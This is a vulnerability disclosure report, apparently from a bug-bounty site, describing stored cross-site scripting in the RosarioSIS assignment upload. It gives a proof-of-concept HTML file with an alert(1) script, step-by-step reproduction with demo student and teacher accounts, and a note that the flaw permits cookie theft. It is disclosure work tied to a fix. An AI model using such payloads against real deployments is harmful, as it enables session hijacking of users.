Cross-site Scripting (XSS) - Stored via HTML file upload in francoisjacquet/rosariosis
Reported on
Apr 26th 2022
Description
rosariosis is vulnerable to Stored XSS in the File upload in Assignments by uploading an HTML file with the javascript code inside.
Proof-of-Concept
phish.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Test Upload File</title>
</head>
<body>
<h1>Test upload</h1>
<script>alert(1)</script>
</body>
</html>
Step to reproduce
From attacker side (student)
1.Login to the demo environment by student account (student/student)
2.In the left menu, go to GRADES -> Assignments
3.Click on Add and subtract assignment
4.Click Choose file and upload the phish HTML file above
5.Click on SUBMIT ASSIGNMENT
From victim side (teacher)
1.Login to the demo environment by teacher account (teacher/teacher)
2.In the left menu, go to GRADES -> Grades
3.Click on Student S Student student
4.Click View online in the Submission column
5.Click on Download link and you will see the XSS is triggered
Impact
This vulnerability has the potential to phish user to another page and trick user to steal cookies and gain unauthorized access to that user's account through the stolen cookies.
Occurrences
SECURITY.md exists
2 years ago
Hi @maintainer,
First of all, thank you for confirming my report.
Along with this, I also reported to you two more report related to the upload function (xhtml and htm
I see that your fix above has also covered these two extensions.
My two report are here:
Report 1
Report 2
So base on the fix that you committed, I hope that you also validate those two reports by confirming the same fix commit like in this report (https://github.com/francoisjacquet/rosariosis/commit/90842ca1d30e2a3d52bcef024032f25d445c0edd)
Thank you a lot!